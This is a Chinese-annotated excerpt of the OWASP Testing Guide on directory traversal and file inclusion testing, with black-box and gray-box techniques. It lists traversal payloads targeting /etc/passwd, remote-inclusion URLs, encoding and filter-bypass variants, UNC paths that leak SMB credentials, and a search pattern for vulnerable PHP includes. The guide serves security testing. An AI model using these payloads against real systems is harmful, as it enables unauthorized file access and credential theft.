owasp渗透测试指南 OWASP Testing Guide v5

owasp渗透测试指南文档地址：
https://github.com/OWASP/OWASP-Testing-Guide-v5

github.com/OWASP/../4.6.1_Testing_Directory_Traversal_File_Include_OTG-AUTHZ-001

总结

（a）输入向量计数（对每个输入向量的系统评估）

（b）测试技术（对攻击者利用漏洞使用的每种攻击技术进行系统评估）

How to Test（如何测试）

Black Box Testing（黑盒测试）

Input Vectors Enumeration（输入向量枚举）

http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm

Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed

Testing Techniques（测试技巧）

http://example.com/getUserProfile.jsp?item=../../../../etc/passwd

Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd

http://example.com/index.php?file=http://www.owasp.org/malicioustxt

http://example.com/index.php?file=file:///etc/passwd

http://example.com/index.php?file=http://localhost:8080 
或者
http://example.com/index.php?file=http://192.168.0.2:9080

http://example.com/main.cgi?home=main.cgi

Unix-like OS:

• root directory: “/
• directory separator: “/

Windows OS’ Shell’:

• root directory: “<drive letter>:\
• directory separator: “” or “/”

Classic Mac OS:

• root directory: “<drive letter>:
• directory separator: “:

• URL encoding and double URL encoding
• %2e%2e%2f represents ../
• %2e%2e/ represents ../
• ..%2f represents ../
• %2e%2e%5c represents ..\
• %2e%2e\ represents ..\
• ..%5c represents ..\
• %252e%252e%255c represents ..\
• ..%255c represents ..\ and so on.
• Unicode/UTF-8 Encoding (it only works in systems that are able to accept overlong UTF-8 sequences)
• ..%c0%af represents ../
• ..%c1%9c represents ..\

• Windows shell: Appending any of the following to paths used in a shell command results in no difference in function:
• Angle brackets “>” and “<” at the end of the path
• Double quotes (closed properly) at the end of the path
• Extraneous current directory markers such as “./” or “.\”
• Extraneous parent directory markers with arbitrary items that may or may not exist Examples:
file.txt
file.txt...
file.txt<spaces>
file.txt””””
file.txt<<<>>><
./././file.txt
nonexistant/../file.txt
• Windows API: The following items are discarded when used in any shell command or API call where a string is taken as a filename:
• periods
• spaces
• Windows UNC Filepaths: Used to reference files on SMB shares. Sometimes, an application can be made to refer to files on a remote UNC filepath. If so, the Windows SMB server may send stored credentials to the attacker, which can be captured and cracked. These may also be used with a self-referential IP address or domain name to evade filters, or used to access files on SMB shares inaccessible to the attacker, but accessible from the web server.
\server_or_ip\path\to\file.abc
\?\server_or_ip\path\to\file.abc
• Windows NT Device Namespace: Used to refer to the Windows device namespace. Certain references will allow access to file systems using a different path.
• May be equivalent to a drive letter such as c:\, or even a drive volume without an assigned letter.\\.\GLOBALROOT\Device\HarddiskVolume1\
• Refers to the first disc drive on the machine. \\.\CdRom0\

Gray Box Testing（灰盒测试）

PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ... JSP/Servlet: java.io.File(), java.io.FileReader(), ... ASP: include file, include virtual, ...

lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)

    filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);

    file=....//....//boot.ini
file=....\....\boot.ini
file= ..\..\boot.ini

用到的工具：

owasp渗透测试指南文档地址：
https://github.com/OWASP/OWASP-Testing-Guide-v5